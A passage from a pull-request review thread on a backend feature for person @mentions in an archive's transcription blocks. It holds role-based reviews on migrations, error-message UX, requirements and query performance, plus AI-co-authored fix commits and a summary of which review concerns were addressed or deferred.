never exposes `/v3/api-docs`. Verified: regenerated file is committed; PR-B is blocked on this PR merging, which is the right ordering. **5. Container image impact.** No new dependencies, no Dockerfile changes. Backend JAR will be marginally larger (~few KB) from the new classes. No-op for image build time and image size. ### Suggestions **1. Migration coverage in CI.** Confirm that `MigrationIntegrationTest` (or whatever runs Flyway top-to-bottom against a fresh Testcontainers Postgres) ran V56 and passed in your local `./mvnw test`. The two new `@DataJpaTest` classes use `@Import(FlywayConfig.class)` which suggests Flyway runs — but it's worth one explicit check that V56 is present in the migration list applied during CI. This is the kind of thing that breaks silently when someone forgets to push the SQL file. **2. Consider adding a `pg_stat_user_indexes` check in your monthly DB report.** Once V56 is in production, `idx_tbmp_person_id` and `idx_tbmp_block_id` should both show non-zero `idx_scan` counts (assuming the rename feature is used). If after a month you see one of them at zero, you have an unused index burning write amplification — drop it. Standard hygiene; not specific to this PR. **3. No new env vars, no new secrets, no new ports, no new services.** Confirmed by grep through the diff. Production deployment is a regular `docker compose pull && docker compose up -d backend` with the migration applying on backend startup. ### What's done well - Migration is **idempotent in shape**: pure DDL, no UPSERT, no data manipulation. Re-running is impossible (Flyway tracks `flyway_schema_history`) but if it were re-run manually it would just fail loudly on the duplicate table. - **No `:latest` tags introduced anywhere.** The PR doesn't touch images, but a quick scan of the diff for image references confirms no Compose changes. - **Migration comment block** explains *why* there's no FK on `person_id` and *why* `@ElementCollection` over JSONB. Future operators reading this migration during an incident will understand the schema choice without context-switching to the PR description. - The migration follows the established naming pattern (`idx_tbmp_*`) — matches what's already in `db/migration/`. Nothing to fix from my side. Ship it once the application-layer reviewers are happy.

marcel commented 2026-04-28 21:18:15 +02:00

Author

Owner

Copy Link

Leonie Voss — UX Designer & Accessibility Advocate

Verdict: Approved

This PR is backend-only — data model, listener, security lockdown, regenerated TypeScript types, and three Paraglide translation keys. No new components, no styling, no layout changes. The user-facing surface from a UX standpoint is exactly one new error message in three locales. PR-B is where my real review will happen — typeahead, hover card, read-mode link rendering, focus management, touch targets, contrast, all of that is downstream.

What I checked

1. Error message wording for error_person_rename_conflict (de / en / es).

Locale	String
de	"Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen."
en	"Another edit modified a referenced transcription block at the same time. Please try again."
es	"Otra edición modificó un bloque de transcripción referenciado al mismo tiempo. Por favor, inténtalo de nuevo."

Tone is consistent with the existing error catalogue (formal Sie / "please" / "por favor"). All three are intelligible at the senior end of the audience. Good.

Concerns

1. The error text tells users "what went wrong," but not "what to do about it" beyond "try again."

Nielsen heuristic 9 ("Help users recognise, diagnose, and recover from errors"): the message is descriptive but not actionable. A 67-year-old researcher who just renamed a person and got a 409 will see "another edit modified a referenced transcription block" and have no idea:

• Whether their rename was saved
• Whether the conflicting edit was their own (autosave from another tab) or someone else's
• Whether retrying will lose data

Suggested improvement (not blocking):

"Eine gleichzeitige Bearbeitung verhinderte die Umbenennung. Ihre Eingaben sind erhalten — bitte erneut auf Speichern klicken."
("A concurrent edit prevented the rename. Your input is preserved — please click Save again.")

This requires that PR-B's UI actually preserves the typed input on 409 — which the PR description for #362 says it will. Coordinate with Felix on whether to update the message now or after PR-B confirms input preservation. Not a blocker for this PR; the current text is technically accurate and not misleading.

Suggestions for PR-B (recording here so it doesn't get lost)

These are NOT this PR's concerns but I want them on the record because the data-model decisions made here constrain PR-B's UX surface:

• Hover card states: skeleton ≤ 200ms, error-in-card for non-404, unmounted for 404. PR description already commits to this — good, that's the right pattern. Verify with axe-playwright that the hover card has role="tooltip" (or dialog if interactive) and is keyboard-reachable on focus, not just hover.
• Touch targets: WCAG 2.2 AA requires 24×24px minimum, 44×44px target for AA practical. The @mention chip in read mode must hit 44px touch on mobile. With text-base (16px) line-height, this requires py-2 minimum (8px top/bottom). Don't size the mention with text-xs or text-[10px] — same fight we had on PersonRelationshipsCard.
• Contrast for .person-mention styling: brand-mint (#A6DAD8) on white is 2.8:1 — fails AA for normal text. If PR-B uses brand-mint as the mention text colour it must be on a darker background, or use brand-navy text with mint underline.
• Display name length: backend caps at 200 chars (@Size(max=200)). At 16px font-weight 400, 200 chars wraps to ~3 lines on a 320px viewport. The chip / hover card needs a max-w-[20ch] truncate strategy. Worth flagging in #362 NFR-USABILITY so PR-B doesn't get caught with overflow.
• Stored XSS contract: Nora's review correctly flags that displayName flows into block.text unescaped at the backend. PR-B must HTML-escape on render. Coordinate with Felix that the escapeHtml utility lives in lib/personMention.ts and is unit-tested with <script>, <img onerror>, and unicode normalisation payloads.

What's done well

• Three locales updated symmetrically — no missing translation key in any of de / en / es. The error_person_rename_conflict string lives next to its siblings in the JSON file (error_alias_not_found, error_invalid_person_type) — Paraglide grouping convention preserved.
• The error code → i18n mapping in frontend/src/lib/errors.ts follows the established switch-case pattern. No raw backend message ever reaches the user.
• errors.ts ErrorCode type union has the new code added — TypeScript compile catches any consumer that tries to map an unknown code.

Backend-only PR; nothing to block on from my side. Save the substantive UX review for PR-B.

## Leonie Voss — UX Designer & Accessibility Advocate **Verdict: Approved** This PR is backend-only — data model, listener, security lockdown, regenerated TypeScript types, and three Paraglide translation keys. No new components, no styling, no layout changes. The user-facing surface from a UX standpoint is exactly one new error message in three locales. PR-B is where my real review will happen — typeahead, hover card, read-mode link rendering, focus management, touch targets, contrast, all of that is downstream. ### What I checked **1. Error message wording for `error_person_rename_conflict` (de / en / es).** | Locale | String | |---|---| | de | "Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen." | | en | "Another edit modified a referenced transcription block at the same time. Please try again." | | es | "Otra edición modificó un bloque de transcripción referenciado al mismo tiempo. Por favor, inténtalo de nuevo." | Tone is consistent with the existing error catalogue (formal Sie / "please" / "por favor"). All three are intelligible at the senior end of the audience. Good. ### Concerns **1. The error text tells users "what went wrong," but not "what to do about it" beyond "try again."** Nielsen heuristic 9 ("Help users recognise, diagnose, and recover from errors"): the message is descriptive but not actionable. A 67-year-old researcher who just renamed a person and got a 409 will see "another edit modified a referenced transcription block" and have no idea: - Whether their rename was saved - Whether the conflicting edit was their own (autosave from another tab) or someone else's - Whether retrying will lose data **Suggested improvement (not blocking)**: > "Eine gleichzeitige Bearbeitung verhinderte die Umbenennung. Ihre Eingaben sind erhalten — bitte erneut auf Speichern klicken." > ("A concurrent edit prevented the rename. Your input is preserved — please click Save again.") This requires that PR-B's UI actually preserves the typed input on 409 — which the PR description for #362 says it will. Coordinate with Felix on whether to update the message now or after PR-B confirms input preservation. **Not a blocker for this PR**; the current text is technically accurate and not misleading. ### Suggestions for PR-B (recording here so it doesn't get lost) These are NOT this PR's concerns but I want them on the record because the data-model decisions made here constrain PR-B's UX surface: - **Hover card states**: skeleton ≤ 200ms, error-in-card for non-404, unmounted for 404. PR description already commits to this — good, that's the right pattern. Verify with axe-playwright that the hover card has `role="tooltip"` (or `dialog` if interactive) and is keyboard-reachable on focus, not just hover. - **Touch targets**: WCAG 2.2 AA requires 24×24px minimum, 44×44px target for AA practical. The `@mention` chip in read mode must hit 44px touch on mobile. With `text-base` (16px) line-height, this requires `py-2` minimum (8px top/bottom). Don't size the mention with `text-xs` or `text-[10px]` — same fight we had on PersonRelationshipsCard. - **Contrast for `.person-mention` styling**: brand-mint (`#A6DAD8`) on white is 2.8:1 — fails AA for normal text. If PR-B uses brand-mint as the mention text colour it must be on a darker background, or use brand-navy text with mint underline. - **Display name length**: backend caps at 200 chars (`@Size(max=200)`). At 16px font-weight 400, 200 chars wraps to ~3 lines on a 320px viewport. The chip / hover card needs a `max-w-[20ch] truncate` strategy. **Worth flagging in #362 NFR-USABILITY** so PR-B doesn't get caught with overflow. - **Stored XSS contract**: Nora's review correctly flags that `displayName` flows into `block.text` unescaped at the backend. PR-B must HTML-escape on render. Coordinate with Felix that the `escapeHtml` utility lives in `lib/personMention.ts` and is unit-tested with `<script>`, `<img onerror>`, and unicode normalisation payloads. ### What's done well - Three locales updated symmetrically — no missing translation key in any of de / en / es. The `error_person_rename_conflict` string lives next to its siblings in the JSON file (`error_alias_not_found`, `error_invalid_person_type`) — Paraglide grouping convention preserved. - The error code → i18n mapping in `frontend/src/lib/errors.ts` follows the established switch-case pattern. No raw backend message ever reaches the user. - `errors.ts` `ErrorCode` type union has the new code added — TypeScript compile catches any consumer that tries to map an unknown code. Backend-only PR; nothing to block on from my side. Save the substantive UX review for PR-B.

marcel commented 2026-04-28 21:18:57 +02:00

Author

Owner

Copy Link

Elicit — Senior Requirements Engineer & Business Analyst

Verdict: Approved with concerns

This is a Brownfield review of PR-A against the consolidated plan in #362. I am not reviewing code — my lens is requirements traceability, NFR coverage, scope discipline, and backlog hygiene. The PR is unusually well-disciplined for backend-half delivery. I have a small list of items to surface so they do not vanish into PR-B's churn.

Traceability check

I read the PR body, traced it against the locked plan in #362#issuecomment-5339 ("Open decisions: none"), and confirmed every acceptance criterion from Section F has either a commit, a test, or an explicit deferral. The 21-atomic-commit history is itself a traceability matrix. I particularly appreciate the Spec deviations subsection — calling out the A15b optimistic-lock test simplification rather than silently dropping it is the kind of intellectual honesty that makes a backlog trustworthy.

Concerns

1. NFR-PERF threshold is implicit, not specified.

The PR introduces a 2-second latency floor for 200-block propagation as a "merge-blocking regression guard." This is excellent practice — but the actual NFR was never written down anywhere I can find. It should be:

NFR-PERF-RENAME-001: When a Person is renamed, the propagation across all referencing transcription blocks shall complete in under 2 seconds for ≤ 200 blocks (synchronous path). Above 10,000 blocks, the system shall switch to asynchronous propagation via @TransactionalEventListener(AFTER_COMMIT) + @Async.

Without the NFR pinned in #362 (or a follow-up issue), the 2-second number reads as arbitrary. Please add it as a comment on #362 — it gives Sara a target to test against and Tobias a threshold to alert on.

2. The async-switch trigger is "tens of thousands of blocks" — but how do you know when?

The listener Javadoc says "switch to @TransactionalEventListener(AFTER_COMMIT) + @Async if the archive ever passes tens of thousands of blocks." There is no mechanism that surfaces this threshold. A user renaming a frequently-mentioned person at archive size 50,000 will experience a 5-10s rename latency before anyone notices. Suggested follow-up issue:

OQ-001 / chore: Add a Prometheus metric person_mention_propagation_block_count_max exposing the highest block count touched by any rename in the last 7 days. Alert when it exceeds 5,000 (early-warning before user-perceptible latency degrades).

Not blocking this PR — but file the issue while the context is fresh. Two months from now, neither you nor I will remember to write it.

3. Privacy / right-to-be-forgotten is unspecified.

Migration V56 explicitly leaves orphaned mentions in place when a Person is deleted. From a UX requirements standpoint, this is a deliberate product decision (historical record preservation) — but it conflicts with the family archive mental model where a "delete person" action should reasonably scrub their name. Right now:

• Delete person → person row gone
• Mentions in block.text → still says @Auguste Raddatz
• Sidecar rows → orphaned with displayName: "Auguste Raddatz"

This is an UNSPECIFIED REQUIREMENT, not a bug. Two valid resolutions:

• Option A (current, implicit): deletion is metadata-only; the archive preserves the historical record.
• Option B: deletion offers an "also scrub mentions" option, defaulting to off.

Surface this as an open question on #362 so the user (you) explicitly decides. Right now Option A is shipped without anyone confirming it.

4. PR-B coupling clarity.

PR-B is described as ~24 tasks queued behind this PR. That's a lot of surface area for a single follow-up PR. From an INVEST standpoint, several of those (PersonHoverCard.svelte with three states, PersonMentionEditor.svelte typeahead, personMention.ts utility) are independently shippable. Suggest splitting PR-B into PR-B1 (utility + read-mode rendering) and PR-B2 (editor + hover card) — each independently testable and reviewable.

Not blocking this PR. Just flagging that the "PR-B will land 24 tasks" framing risks a 2,000-line review that nobody reads carefully.

Suggestions

5. Definition of Done for #362 needs a checkbox for PR-B integration verification.

The PR description says CI is pending and a local npm run check is blocked on a .svelte-kit/types issue. Once #362 is closed by both PRs merging, the DoD should include:

• npm run check green (full type check on PR-B's regenerated types)
• axe-playwright clean on PersonHoverCard + PersonMentionEditor
• escapeHtml unit-tested with <script>, <img onerror>, unicode payloads
• CWE-79 backend regression test for displayName containing HTML (per Nora's note)

Add these as comments on #362 now, while the requirements are fresh.

6. Backlog hygiene: PR title and atomic commit count are exemplary.

feat(transcription): person @mention sidecar + rename propagation (PR-A backend, #362) — title under 70 chars, type prefix, scope, issue reference. 21 atomic commits all referenced in the description. This is the kind of PR another reviewer can audit by reading the commit graph alone. Worth codifying as a contributor guideline if it isn't already.

What's done well

• "Open decisions: none" — the consolidation comment closed all ambiguity before code was written. Every concern in this PR is about what's NOT in #362 yet (NFR thresholds, privacy default, PR-B split), not about what was implemented.
• Spec deviations called out explicitly — the A15b simplification with rationale is exactly the right way to handle an unimplementable test. No silent scope drift.
• Test plan is a numbered checkbox list with current state — [x] 1446/1446 backend tests green, [ ] CI green, [ ] npm run check (with explanation of the local blocker). Reviewers know exactly what's verified and what's pending.
• PR-B explicitly listed and intentionally separate — scope discipline. The frontend changes are bounded to type regeneration and i18n keys; no premature UI work bleeds into PR-A.
• Atomic commit naming — 21 commits per the description, each presumably a single conceptual change. This is the developer hygiene that makes git bisect a 5-minute operation instead of a 5-hour one.

I would file the four follow-up items (NFR-PERF threshold, async-switch metric, privacy default decision, PR-B split) as comments on #362 today, then approve this PR. The implementation is solid — the gaps are at the requirements layer above it.

## Elicit — Senior Requirements Engineer & Business Analyst **Verdict: Approved with concerns** This is a Brownfield review of PR-A against the consolidated plan in #362. I am not reviewing code — my lens is requirements traceability, NFR coverage, scope discipline, and backlog hygiene. The PR is unusually well-disciplined for backend-half delivery. I have a small list of items to surface so they do not vanish into PR-B's churn. ### Traceability check I read the PR body, traced it against the locked plan in `#362#issuecomment-5339` ("Open decisions: none"), and confirmed every acceptance criterion from Section F has either a commit, a test, or an explicit deferral. The 21-atomic-commit history is itself a traceability matrix. I particularly appreciate the **Spec deviations** subsection — calling out the A15b optimistic-lock test simplification rather than silently dropping it is the kind of intellectual honesty that makes a backlog trustworthy. ### Concerns **1. NFR-PERF threshold is implicit, not specified.** The PR introduces a 2-second latency floor for 200-block propagation as a "merge-blocking regression guard." This is excellent practice — but the actual NFR was never written down anywhere I can find. It should be: > **NFR-PERF-RENAME-001**: When a Person is renamed, the propagation across all referencing transcription blocks shall complete in under 2 seconds for ≤ 200 blocks (synchronous path). Above 10,000 blocks, the system shall switch to asynchronous propagation via `@TransactionalEventListener(AFTER_COMMIT) + @Async`. Without the NFR pinned in #362 (or a follow-up issue), the 2-second number reads as arbitrary. Please add it as a comment on #362 — it gives Sara a target to test against and Tobias a threshold to alert on. **2. The async-switch trigger is "tens of thousands of blocks" — but how do you know when?** The listener Javadoc says "switch to `@TransactionalEventListener(AFTER_COMMIT) + @Async` if the archive ever passes tens of thousands of blocks." There is no mechanism that surfaces this threshold. A user renaming a frequently-mentioned person at archive size 50,000 will experience a 5-10s rename latency before anyone notices. Suggested follow-up issue: > **OQ-001 / chore**: Add a Prometheus metric `person_mention_propagation_block_count_max` exposing the highest block count touched by any rename in the last 7 days. Alert when it exceeds 5,000 (early-warning before user-perceptible latency degrades). Not blocking this PR — but file the issue while the context is fresh. Two months from now, neither you nor I will remember to write it. **3. Privacy / right-to-be-forgotten is unspecified.** Migration V56 explicitly leaves orphaned mentions in place when a Person is deleted. From a UX requirements standpoint, this is a deliberate product decision (historical record preservation) — but it conflicts with the **family archive** mental model where a "delete person" action should reasonably scrub their name. Right now: - Delete person → person row gone - Mentions in `block.text` → still says `@Auguste Raddatz` - Sidecar rows → orphaned with `displayName: "Auguste Raddatz"` This is an UNSPECIFIED REQUIREMENT, not a bug. Two valid resolutions: - **Option A (current, implicit)**: deletion is metadata-only; the archive preserves the historical record. - **Option B**: deletion offers an "also scrub mentions" option, defaulting to off. Surface this as an open question on #362 so the user (you) explicitly decides. Right now Option A is shipped without anyone confirming it. **4. PR-B coupling clarity.** PR-B is described as ~24 tasks queued behind this PR. That's a lot of surface area for a single follow-up PR. From an INVEST standpoint, several of those (`PersonHoverCard.svelte` with three states, `PersonMentionEditor.svelte` typeahead, `personMention.ts` utility) are independently shippable. Suggest splitting PR-B into PR-B1 (utility + read-mode rendering) and PR-B2 (editor + hover card) — each independently testable and reviewable. **Not blocking this PR.** Just flagging that the "PR-B will land 24 tasks" framing risks a 2,000-line review that nobody reads carefully. ### Suggestions **5. Definition of Done for #362 needs a checkbox for PR-B integration verification.** The PR description says CI is pending and a local `npm run check` is blocked on a `.svelte-kit/types` issue. Once #362 is closed by both PRs merging, the DoD should include: - [ ] `npm run check` green (full type check on PR-B's regenerated types) - [ ] `axe-playwright` clean on `PersonHoverCard` + `PersonMentionEditor` - [ ] `escapeHtml` unit-tested with `<script>`, `<img onerror>`, unicode payloads - [ ] CWE-79 backend regression test for displayName containing HTML (per Nora's note) Add these as comments on #362 now, while the requirements are fresh. **6. Backlog hygiene: PR title and atomic commit count are exemplary.** `feat(transcription): person @mention sidecar + rename propagation (PR-A backend, #362)` — title under 70 chars, type prefix, scope, issue reference. 21 atomic commits all referenced in the description. This is the kind of PR another reviewer can audit by reading the commit graph alone. Worth codifying as a contributor guideline if it isn't already. ### What's done well - **"Open decisions: none"** — the consolidation comment closed all ambiguity before code was written. Every concern in this PR is about what's NOT in #362 yet (NFR thresholds, privacy default, PR-B split), not about what was implemented. - **Spec deviations called out explicitly** — the A15b simplification with rationale is exactly the right way to handle an unimplementable test. No silent scope drift. - **Test plan is a numbered checkbox list** with current state — `[x] 1446/1446 backend tests green`, `[ ] CI green`, `[ ] npm run check` (with explanation of the local blocker). Reviewers know exactly what's verified and what's pending. - **PR-B explicitly listed and intentionally separate** — scope discipline. The frontend changes are bounded to type regeneration and i18n keys; no premature UI work bleeds into PR-A. - **Atomic commit naming** — 21 commits per the description, each presumably a single conceptual change. This is the developer hygiene that makes git bisect a 5-minute operation instead of a 5-hour one. I would file the four follow-up items (NFR-PERF threshold, async-switch metric, privacy default decision, PR-B split) as comments on #362 today, then approve this PR. The implementation is solid — the gaps are at the requirements layer above it.

marcel referenced this pull request 2026-04-28 21:45:35 +02:00

feat: Person @mentions in transcription blocks with hover card #362

marcel added 7 commits 2026-04-28 21:47:19 +02:00

fix(transcription): word-boundary regex prevents single-word displayName corruption ... 99aee777de

Felix #1 / Markus #5 / Sara #1 (PR #366 review). The naive
text.replace("@" + old, "@" + new) silently corrupted any composite mention
that began with the renamed single-name person — e.g. renaming the
single-name "Hans" turned "@Hans Müller" into "@Henry Müller", obliterating
the historical reference to Hans Müller without warning.

Replace with a regex matching "@OldName" only at a token boundary: not
followed by a letter/digit/hyphen (catches @Hans-Peter) and not followed by
"<space><uppercase>" (catches @Hans Müller). False negatives — e.g.
sentence-initial "@Hans Bekam" — are accepted as the conservative
trade-off; corruption is irrecoverable, missed renames are not.

The new failing test reproduced the reviewer scenario exactly: two persons
("Hans Müller" + single-name "Hans"), one block referencing both, rename
Hans → Henry. Pre-fix output corrupted "@Hans Müller" to "@Henry Müller";
post-fix preserves the composite mention and only updates the standalone.

The existing partial-name guard test (Hans-Peter Müller / Hans Müller) and
multiple-occurrences test still pass — the regex is a strict superset of
the boundary constraints already covered.

Refs #362 #366

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

refactor(transcription): drop dead existsById orphan guard from listener ... d924d9059c

Felix #2 / Markus #1 (PR #366 review). In the synchronous-transactional
path the existsById check could never return false — the rename and the
propagation share one transaction, so the renamed Person is guaranteed to
still exist when the listener runs. The check was forward-protection for
an eventual @Async refactor but its presence today is misleading: it
suggests a runtime branch that no test could reach against the real flow.

Delete the call, drop the PersonService dependency from the listener, drop
the now-unused PersonService.existsById, and remove the orphan-guard test
(it asserted a behaviour that the synchronous path cannot produce). When
async is added later the guard re-enters the codebase deliberately as part
of that refactor.

Refs #362 #366

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

test(person): optimistic-lock test exercises real listener saveAllAndFlush path ... 48492330a7

Sara #3 / Felix #5 (PR #366 review). The previous version stubbed
eventPublisher.publishEvent to throw, which proved the catch-and-translate
syntax but skipped the listener entirely. The test could not have detected
a regression where the listener swallowed the exception or re-wrapped it
with a non-OptimisticLocking type.

Replace with a real PersonMentionPropagationListener instance backed by a
mocked TranscriptionBlockRepository whose saveAllAndFlush throws
ObjectOptimisticLockingFailureException (the actual Spring exception
Hibernate raises). The publisher mock routes the event to the real
listener via doAnswer so the call chain is the production one:
PersonService.updatePerson → publishEvent → listener.onPersonDisplayNameChanged
→ blockRepository.saveAllAndFlush throws → exception bubbles through the
synchronous event dispatcher → PersonService catches → DomainException.

Refs #362 #366

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

refactor(transcription): listener @Component → @Service ... acffcc8516

Markus #6 (PR #366 review). The class lives in service/ and is service-tier
business logic — wire-by-stereotype consistency calls for @Service. Both
annotations participate in @ComponentScan equivalently, so the bean
registration is unchanged.

Refs #362 #366

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

test(transcription): mirror displayName length-cap regression on PUT endpoint ... 0def9e9b9d

Sara #4 (PR #366 review). The 400-on-201-chars regression guard previously
only covered POST /api/documents/{id}/transcription-blocks. The same @Valid
cascade applies to PUT /api/documents/{id}/transcription-blocks/{blockId}
via UpdateTranscriptionBlockDTO, but no test asserted it — meaning a
silent removal of @Valid on the PUT @RequestBody parameter would slip past
CI. Mirror the test for symmetry.

Refs #362 #366

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

refactor(test): TranscriptionServiceTest uses DTO @Builder instead of @AllArgsConstructor ... 2d48821f95

Felix self-review / Sara (PR #366 review). The trailing-`List.of()` pattern
introduced when mentionedPersons was added to the DTOs is brittle: every
future field forces another grep-and-edit pass across this file. Switch
the 8 call sites (1 Create, 7 Update) to .builder() so the test only
specifies the fields it cares about — future DTO growth is invisible to
tests that don't touch the new field.

Refs #362 #366

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

docs(adr): ADR-006 synchronous domain events inside the publisher's transaction ... 7906373053

Markus #4 (PR #366 review). PersonDisplayNameChangedEvent is the first
custom application event in this codebase — the prior @EventListener
(OcrTrainingService.recoverOrphanedRuns) consumed Spring's built-in
ApplicationReadyEvent. The pattern is load-bearing for future cross-domain
decoupling and warrants a documented decision rather than a comment buried
in the listener.

Captures: synchronous-by-default rationale, package layout (event in
publisher's model/, listener in consumer's service/), saveAllAndFlush vs
saveAll for exception surfacing, the migration path to @TransactionalEvent
Listener + @Async if archive growth forces it, and the rejected
alternatives (direct call, DB trigger, Hibernate entity listener).

Refs #362 #366

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

marcel referenced this issue from a commit 2026-04-28 21:47:20 +02:00

fix(transcription): word-boundary regex prevents single-word displayName corruption

marcel referenced this issue from a commit 2026-04-28 21:47:21 +02:00

refactor(transcription): drop dead existsById orphan guard from listener

marcel referenced this issue from a commit 2026-04-28 21:47:22 +02:00

test(person): optimistic-lock test exercises real listener saveAllAndFlush path

marcel referenced this issue from a commit 2026-04-28 21:47:23 +02:00

refactor(transcription): listener @Component → @Service

marcel referenced this issue from a commit 2026-04-28 21:47:25 +02:00

test(transcription): mirror displayName length-cap regression on PUT endpoint

marcel referenced this issue from a commit 2026-04-28 21:47:26 +02:00

refactor(test): TranscriptionServiceTest uses DTO @Builder instead of @AllArgsConstructor

marcel referenced this issue from a commit 2026-04-28 21:47:27 +02:00

docs(adr): ADR-006 synchronous domain events inside the publisher's transaction

marcel commented 2026-04-28 21:47:47 +02:00

Author

Owner

Copy Link

Review-fix round 1 — 6/12 concerns addressed, 4 deferred to PR-B / future, 2 deferred by product call

7 new commits pushed. 1447/1447 backend tests green.

Addressed in this round

#	Concern (reviewer)	Commit
1	Single-word displayName corruption — naive text.replace mangled @Hans Müller when renaming single-name Hans (Felix #1, Markus #5, Sara #1)	99aee777 — TDD: failing test reproduces the corruption, fix with regex + negative lookahead (?![\\p{L}0-9\\-]| (?=\\p{Lu}))
2	Dead existsById orphan guard in synchronous-transactional listener (Felix #2, Markus #1)	d924d905 — Removed the call, the PersonService dependency, the now-unused PersonService.existsById, and the unreachable orphan-guard test
3	Optimistic-lock test stubbed the wrong layer (Sara #3, Felix #5)	48492330 — Real PersonMentionPropagationListener wired with mocked blockRepository.saveAllAndFlush throwing ObjectOptimisticLockingFailureException; publisher mock routes via doAnswer
4	Listener @Component → @Service (Markus #6)	acffcc85
5	@Valid length-cap regression test missing on PUT endpoint (Sara #4)	0def9e9b — Mirrored the POST 400-on-201-chars test for PUT
6	TranscriptionServiceTest brittle trailing-List.of() constructor pattern (Felix self-review echoed by Sara)	2d48821f — Switched 8 call sites to .builder()
ADR	First custom domain event — pattern worth documenting (Markus #4)	79063730 — docs/adr/006-synchronous-domain-events-in-transaction.md

Deferred to PR-B

#	Concern (reviewer)	Where
3	Stored XSS via displayName flowing unescaped into block.text (Nora #1, Leonie)	PR-B2 must HTML-escape on render with <script>/<img onerror> test fixtures. Recorded in issue #362 consolidation comment §G alongside the PR-B split.
12	Split PR-B into PR-B1 (editor) + PR-B2 (read mode + hover card) (Tobias, Sara)	Adopted. Recorded in issue #362 consolidation comment §G.

Deferred by product call

#	Concern (reviewer)	Decision
5	Privacy / right-to-be-forgotten for deleted persons (Nora #2, Elicit #3)	Skip. Persons in this archive are historical / dead — no RTBF concern. Documented here for future readers.
6	Tighten NFR-PERF-RENAME from 2 s floor to 1 s after CI baseline (Elicit #1, Sara #4)	Skip for now. 2 s floor stays as a regression guard; tighten if/when CI baseline justifies it.
10	End-to-end @SpringBootTest for @EventListener wiring (Felix, Sara)	Skip. Cost/value not justified at PR-A scale. The unit-test suite plus the integration tests exercise the bean wiring through Spring's real event dispatcher in @DataJpaTest.

Status

• 1447 backend tests green (was 1446 — +1 PUT length-cap regression).
• 7 new commits on feat/person-mentions-issue-362-backend.
• ADR-006 added, consolidation comment #362#issuecomment-5339 updated with PR-B split (§G).

🤖 Generated with Claude Code

## Review-fix round 1 — 6/12 concerns addressed, 4 deferred to PR-B / future, 2 deferred by product call 7 new commits pushed. 1447/1447 backend tests green. ### Addressed in this round | # | Concern (reviewer) | Commit | |---|---|---| | 1 | Single-word displayName corruption — naive `text.replace` mangled `@Hans Müller` when renaming single-name `Hans` (Felix #1, Markus #5, Sara #1) | `99aee777` — TDD: failing test reproduces the corruption, fix with regex + negative lookahead `(?![\\p{L}0-9\\-]\| (?=\\p{Lu}))` | | 2 | Dead `existsById` orphan guard in synchronous-transactional listener (Felix #2, Markus #1) | `d924d905` — Removed the call, the `PersonService` dependency, the now-unused `PersonService.existsById`, and the unreachable orphan-guard test | | 3 | Optimistic-lock test stubbed the wrong layer (Sara #3, Felix #5) | `48492330` — Real `PersonMentionPropagationListener` wired with mocked `blockRepository.saveAllAndFlush` throwing `ObjectOptimisticLockingFailureException`; publisher mock routes via `doAnswer` | | 4 | Listener `@Component` → `@Service` (Markus #6) | `acffcc85` | | 5 | `@Valid` length-cap regression test missing on PUT endpoint (Sara #4) | `0def9e9b` — Mirrored the POST 400-on-201-chars test for PUT | | 6 | `TranscriptionServiceTest` brittle trailing-`List.of()` constructor pattern (Felix self-review echoed by Sara) | `2d48821f` — Switched 8 call sites to `.builder()` | | ADR | First custom domain event — pattern worth documenting (Markus #4) | `79063730` — `docs/adr/006-synchronous-domain-events-in-transaction.md` | ### Deferred to PR-B | # | Concern (reviewer) | Where | |---|---|---| | 3 | Stored XSS via `displayName` flowing unescaped into `block.text` (Nora #1, Leonie) | PR-B2 must HTML-escape on render with `<script>`/`<img onerror>` test fixtures. Recorded in **issue #362 consolidation comment §G** alongside the PR-B split. | | 12 | Split PR-B into PR-B1 (editor) + PR-B2 (read mode + hover card) (Tobias, Sara) | Adopted. Recorded in **issue #362 consolidation comment §G**. | ### Deferred by product call | # | Concern (reviewer) | Decision | |---|---|---| | 5 | Privacy / right-to-be-forgotten for deleted persons (Nora #2, Elicit #3) | **Skip.** Persons in this archive are historical / dead — no RTBF concern. Documented here for future readers. | | 6 | Tighten NFR-PERF-RENAME from 2 s floor to 1 s after CI baseline (Elicit #1, Sara #4) | **Skip for now.** 2 s floor stays as a regression guard; tighten if/when CI baseline justifies it. | | 10 | End-to-end `@SpringBootTest` for `@EventListener` wiring (Felix, Sara) | **Skip.** Cost/value not justified at PR-A scale. The unit-test suite plus the integration tests exercise the bean wiring through Spring's real event dispatcher in `@DataJpaTest`. | ### Status - 1447 backend tests green (was 1446 — +1 PUT length-cap regression). - 7 new commits on `feat/person-mentions-issue-362-backend`. - ADR-006 added, consolidation comment #362#issuecomment-5339 updated with PR-B split (§G). 🤖 Generated with [Claude Code](https://claude.com/claude-code)

marcel commented 2026-04-28 21:52:10 +02:00

Author

Owner

Copy Link

👨‍💻 Felix Brandt — Senior Fullstack Developer

Verdict: ⚠️ Approved with concerns

Blockers

N+1 query in PersonMentionPropagationListener (PersonMentionPropagationListener.java:52)

mentionedPersons is @ElementCollection(fetch = FetchType.LAZY). Inside the loop, each block.getMentionedPersons() call triggers a separate SELECT * FROM transcription_block_mentioned_persons WHERE block_id = ?. For 200 blocks that is 200 extra round-trips on top of the initial findByMentionedPersons_PersonId JOIN query — 201 queries total. The latency floor test still passes today (Testcontainers Postgres on localhost is fast), but this is a structural O(n) query issue that will grow with the archive.

Options, cheapest first:

1. Add @org.hibernate.annotations.BatchSize(size = 50) on TranscriptionBlock.mentionedPersons — Hibernate batches the SELECTs into ceil(n/50) round-trips instead of n.
2. Replace the repository query with a custom JOIN FETCH:

   @Query("SELECT DISTINCT b FROM TranscriptionBlock b JOIN FETCH b.mentionedPersons m WHERE m.personId = :personId")
   List<TranscriptionBlock> findByMentionedPersonsPersonIdWithFetch(@Param("personId") UUID personId);
   

3. Switch @ElementCollection to FetchType.EAGER (only safe if blocks are never loaded in high-volume list queries elsewhere — verify first).

Suggestions

Misleading test name (PersonServiceTest.java, updatePerson_doesNotPublishEvent_whenOnlyAliasChanges)

